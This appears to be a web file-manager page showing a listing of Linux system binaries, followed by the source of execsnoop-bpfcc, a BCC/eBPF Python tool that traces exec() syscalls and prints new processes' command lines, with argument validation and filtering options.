8.1
KB
-rwxr-xr-x
wipefs
38.38
KB
-rwxr-xr-x
writeback.bt
1.66
KB
-rwxr-xr-x
xfs_admin
2.12
KB
-rwxr-xr-x
xfs_bmap
695
B
-rwxr-xr-x
xfs_copy
90.44
KB
-rwxr-xr-x
xfs_db
688.56
KB
-rwxr-xr-x
xfs_estimate
14.16
KB
-rwxr-xr-x
xfs_freeze
800
B
-rwxr-xr-x
xfs_fsr
42.18
KB
-rwxr-xr-x
xfs_growfs
38.23
KB
-rwxr-xr-x
xfs_info
1.26
KB
-rwxr-xr-x
xfs_io
203.65
KB
-rwxr-xr-x
xfs_logprint
78.27
KB
-rwxr-xr-x
xfs_mdrestore
34.23
KB
-rwxr-xr-x
xfs_metadump
816
B
-rwxr-xr-x
xfs_mkfile
1.02
KB
-rwxr-xr-x
xfs_ncheck
685
B
-rwxr-xr-x
xfs_quota
90.16
KB
-rwxr-xr-x
xfs_repair
643.32
KB
-rwxr-xr-x
xfs_rtcp
18.15
KB
-rwxr-xr-x
xfs_scrub
106.27
KB
-rwxr-xr-x
xfs_scrub_all
7.66
KB
-rwxr-xr-x
xfs_spaceman
42.3
KB
-rwxr-xr-x
xfsdist-bpfcc
4.61
KB
-rwxr-xr-x
xfsdist.bt
972
B
-rwxr-xr-x
xfsslower-bpfcc
7.78
KB
-rwxr-xr-x
xtables-legacy-multi
92.95
KB
-rwxr-xr-x
xtables-monitor
219.16
KB
-rwxr-xr-x
xtables-nft-multi
219.16
KB
-rwxr-xr-x
zerofree
14.15
KB
-rwxr-xr-x
zfsdist-bpfcc
5.3
KB
-rwxr-xr-x
zfsslower-bpfcc
8.45
KB
-rwxr-xr-x
zic
66.39
KB
-rwxr-xr-x
zramctl
54.52
KB
-rwxr-xr-x
Code Editor : execsnoop-bpfcc
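#! /usr/bin/python3
# @lint-avoid-python-3-compatibility-imports
#
# execsnoop Trace new processes via exec() syscalls.
#           For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: execsnoop [-h] [-T] [-t] [-x] [--cgroupmap CGROUPMAP]
#                  [--mntnsmap MNTNSMAP] [-u USER] [-q] [-n NAME] [-l LINE]
#                  [-U] [--max-args MAX_ARGS] [-P PPID]
#
# This currently will print up to a maximum of 19 arguments, plus the process
# name, so 20 fields in total (MAXARG).
#
# This won't catch all new processes: an application may fork() but not exec().
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 07-Feb-2016   Brendan Gregg   Created this.
# 11-Aug-2022   Rocky Xing      Added PPID filter support.

from __future__ import print_function
from bcc import BPF
from bcc.containers import filter_by_containers
from bcc.utils import ArgString, printb
import argparse
import re
import time
import pwd
from collections import defaultdict
from time import strftime


def parse_non_negative_int(value):
    """argparse ``type=`` callback: accept only a non-negative integer.

    Used for --max-args and --ppid. Both values are substituted into the C
    source of the BPF program below, so anything that is not a plain number
    is rejected at parse time instead of reaching the compiler as text.

    Raises:
        argparse.ArgumentTypeError: if *value* is not an integer or is < 0.
    """
    try:
        result = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError(
            "{0!r} is not a valid integer".format(value))
    if result < 0:
        raise argparse.ArgumentTypeError(
            "{0!r} must not be negative".format(value))
    return result


def parse_uid(user):
    """argparse ``type=`` callback: turn a UID or a user name into a UID.

    A numeric string is used as the UID directly; any other string is looked
    up in the password database with pwd.getpwnam().

    Raises:
        argparse.ArgumentTypeError: if *user* is a negative number, or is
            neither a number nor a known user name.
    """
    try:
        result = int(user)
    except ValueError:
        try:
            user_info = pwd.getpwnam(user)
        except KeyError:
            raise argparse.ArgumentTypeError(
                "{0!r} is not valid UID or user entry".format(user))
        else:
            return user_info.pw_uid
    else:
        # The BPF side compares against a u32, so a negative UID can never
        # describe a real user; reject it rather than build a filter from it.
        if result < 0:
            raise argparse.ArgumentTypeError(
                "{0!r} is not valid UID or user entry".format(user))
        return result


# arguments
examples = """examples:
    ./execsnoop                      # trace all exec() syscalls
    ./execsnoop -x                   # include failed exec()s
    ./execsnoop -T                   # include time (HH:MM:SS)
    ./execsnoop -P 181               # only trace new processes whose parent PID is 181
    ./execsnoop -U                   # include UID
    ./execsnoop -u 1000              # only trace UID 1000
    ./execsnoop -u user              # get user UID and trace only them
    ./execsnoop -t                   # include timestamps
    ./execsnoop -q                   # add "quotemarks" around arguments
    ./execsnoop -n main              # only print command lines containing "main"
    ./execsnoop -l tpkg              # only print command where arguments contains "tpkg"
    ./execsnoop --cgroupmap mappath  # only trace cgroups in this BPF map
    ./execsnoop --mntnsmap mappath   # only trace mount namespaces in the map
"""
parser = argparse.ArgumentParser(
    description="Trace exec() syscalls",
    formatter_class=argparse.RawDescriptionHelpFormatter,
    epilog=examples)
parser.add_argument("-T", "--time", action="store_true",
    help="include time column on output (HH:MM:SS)")
parser.add_argument("-t", "--timestamp", action="store_true",
    help="include timestamp on output")
parser.add_argument("-x", "--fails", action="store_true",
    help="include failed exec()s")
parser.add_argument("--cgroupmap",
    help="trace cgroups in this BPF map only")
parser.add_argument("--mntnsmap",
    help="trace mount namespaces in this BPF map only")
parser.add_argument("-u", "--uid", type=parse_uid, metavar='USER',
    help="trace this UID only")
parser.add_argument("-q", "--quote", action="store_true",
    help="Add quotemarks (\") around arguments."
    )
parser.add_argument("-n", "--name",
    type=ArgString,
    help="only print commands matching this name (regex), any arg")
parser.add_argument("-l", "--line",
    type=ArgString,
    help="only print commands where arg contains this line (regex)")
parser.add_argument("-U", "--print-uid", action="store_true",
    help="print UID column")
# argparse runs the type callback on a string default too, so "20" becomes 20.
parser.add_argument("--max-args", default="20", type=parse_non_negative_int,
    help="maximum number of arguments parsed and displayed, defaults to 20")
parser.add_argument("-P", "--ppid", type=parse_non_negative_int,
    help="trace this parent PID only")
parser.add_argument("--ebpf", action="store_true",
    help=argparse.SUPPRESS)
args = parser.parse_args()

# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/sched.h>
#include <linux/fs.h>

#define ARGSIZE  128

enum event_type {
    EVENT_ARG,
    EVENT_RET,
};

struct data_t {
    u32 pid;  // PID as in the userspace term (i.e. task->tgid in kernel)
    u32 ppid; // Parent PID as in the userspace term (i.e task->real_parent->tgid in kernel)
    u32 uid;
    char comm[TASK_COMM_LEN];
    enum event_type type;
    char argv[ARGSIZE];
    int retval;
};

BPF_PERF_OUTPUT(events);

static int __submit_arg(struct pt_regs *ctx, void *ptr, struct data_t *data)
{
    bpf_probe_read_user(data->argv, sizeof(data->argv), ptr);
    events.perf_submit(ctx, data, sizeof(struct data_t));
    return 1;
}

static int submit_arg(struct pt_regs *ctx, void *ptr, struct data_t *data)
{
    const char *argp = NULL;
    bpf_probe_read_user(&argp, sizeof(argp), ptr);
    if (argp) {
        return __submit_arg(ctx, (void *)(argp), data);
    }
    return 0;
}

int syscall__execve(struct pt_regs *ctx,
    const char __user *filename,
    const char __user *const __user *__argv,
    const char __user *const __user *__envp)
{

    u32 uid = bpf_get_current_uid_gid() & 0xffffffff;

    UID_FILTER

    if (container_should_be_filtered()) {
        return 0;
    }

    // create data here and pass to submit_arg to save stack space (#555)
    struct data_t data = {};
    struct task_struct *task;

    data.pid = bpf_get_current_pid_tgid() >> 32;

    task = (struct task_struct *)bpf_get_current_task();
    // Some kernels, like Ubuntu 4.13.0-generic, return 0
    // as the real_parent->tgid.
    // We use the get_ppid function as a fallback in those cases. (#1883)
    data.ppid = task->real_parent->tgid;

    PPID_FILTER

    bpf_get_current_comm(&data.comm, sizeof(data.comm));
    data.type = EVENT_ARG;

    __submit_arg(ctx, (void *)filename, &data);

    // skip first arg, as we submitted filename
    #pragma unroll
    for (int i = 1; i < MAXARG; i++) {
        if (submit_arg(ctx, (void *)&__argv[i], &data) == 0)
             goto out;
    }

    // handle truncated argument list
    char ellipsis[] = "...";
    __submit_arg(ctx, (void *)ellipsis, &data);
out:
    return 0;
}

int do_ret_sys_execve(struct pt_regs *ctx)
{
    if (container_should_be_filtered()) {
        return 0;
    }

    struct data_t data = {};
    struct task_struct *task;

    u32 uid = bpf_get_current_uid_gid() & 0xffffffff;
    UID_FILTER

    data.pid = bpf_get_current_pid_tgid() >> 32;
    data.uid = uid;

    task = (struct task_struct *)bpf_get_current_task();
    // Some kernels, like Ubuntu 4.13.0-generic, return 0
    // as the real_parent->tgid.
    // We use the get_ppid function as a fallback in those cases. (#1883)
    data.ppid = task->real_parent->tgid;

    PPID_FILTER

    bpf_get_current_comm(&data.comm, sizeof(data.comm));
    data.type = EVENT_RET;
    data.retval = PT_REGS_RC(ctx);
    events.perf_submit(ctx, &data, sizeof(data));

    return 0;
}
"""

# Everything substituted into the C text below is an int produced by one of
# the argparse type callbacks above, and is formatted with %d.
bpf_text = bpf_text.replace("MAXARG", "%d" % args.max_args)

# Compare with None, not truthiness: UID 0 (root) is a valid filter value, and
# a truthiness test would silently drop the filter and trace every user.
if args.uid is not None:
    bpf_text = bpf_text.replace('UID_FILTER',
        'if (uid != %d) { return 0; }' % args.uid)
else:
    bpf_text = bpf_text.replace('UID_FILTER', '')

if args.ppid is not None:
    bpf_text = bpf_text.replace('PPID_FILTER',
        'if (data.ppid != %d) { return 0; }' % args.ppid)
else:
    bpf_text = bpf_text.replace('PPID_FILTER', '')

bpf_text = filter_by_containers(args) + bpf_text
if args.ebpf:
    print(bpf_text)
    exit()

# initialize BPF
b = BPF(text=bpf_text)
execve_fnname = b.get_syscall_fnname("execve")
b.attach_kprobe(event=execve_fnname, fn_name="syscall__execve")
b.attach_kretprobe(event=execve_fnname, fn_name="do_ret_sys_execve")

# header
if args.time:
    print("%-9s" % ("TIME"), end="")
if args.timestamp:
    print("%-8s" % ("TIME(s)"), end="")
if args.print_uid:
    print("%-6s" % ("UID"), end="")
print("%-16s %-7s %-7s %3s %s" % ("PCOMM", "PID", "PPID", "RET", "ARGS"))


class EventType(object):
    """Mirror of ``enum event_type`` in the BPF program text."""
    EVENT_ARG = 0
    EVENT_RET = 1


start_ts = time.time()
# pid -> list of argument chunks received so far for that exec()
argv = defaultdict(list)


def get_ppid(pid):
    """Return the parent PID of *pid* read from /proc/<pid>/status, or 0.

    This is best-effort PPID matching. Short-lived processes may exit
    before we get a chance to read the PPID. It is a fallback for when
    fetching the PPID from task->real_parent->tgid returns 0, which happens
    in some kernel versions.
    """
    try:
        with open("/proc/%d/status" % pid) as status:
            for line in status:
                if line.startswith("PPid:"):
                    return int(line.split()[1])
    except IOError:
        pass
    return 0


# process event
def print_event(cpu, data, size):
    """Perf-buffer callback: collect argument events, print on return events.

    EVENT_ARG events append one argument chunk to the per-PID list in
    ``argv``. An EVENT_RET event applies the --fails/--name/--line filters,
    prints one output line unless filtered out, and then discards the
    buffered arguments for that PID.
    """
    event = b["events"].event(data)
    skip = False

    if event.type == EventType.EVENT_ARG:
        argv[event.pid].append(event.argv)
    elif event.type == EventType.EVENT_RET:
        if event.retval != 0 and not args.fails:
            skip = True
        if args.name and not re.search(bytes(args.name), event.comm):
            skip = True
        if args.line and not re.search(bytes(args.line),
                                       b' '.join(argv[event.pid])):
            skip = True
        if args.quote:
            argv[event.pid] = [
                b"\"" + arg.replace(b"\"", b"\\\"") + b"\""
                for arg in argv[event.pid]
            ]

        if not skip:
            if args.time:
                printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
            if args.timestamp:
                printb(b"%-8.3f" % (time.time() - start_ts), nl="")
            if args.print_uid:
                printb(b"%-6d" % event.uid, nl="")
            ppid = event.ppid if event.ppid > 0 else get_ppid(event.pid)
            ppid = b"%d" % ppid if ppid > 0 else b"?"
            # Escape newlines so one exec() always stays on one output line.
            argv_text = b' '.join(argv[event.pid]).replace(b'\n', b'\\n')
            printb(b"%-16s %-7d %-7s %3d %s" % (event.comm, event.pid,
                   ppid, event.retval, argv_text))
        # Drop the buffered arguments whether or not the line was printed;
        # pop() with a default is a no-op when the PID has no entry.
        argv.pop(event.pid, None)


# loop with callback to print_event
b["events"].open_perf_buffer(print_event)
while True:
    try:
        b.perf_buffer_poll()
    except KeyboardInterrupt:
        exit()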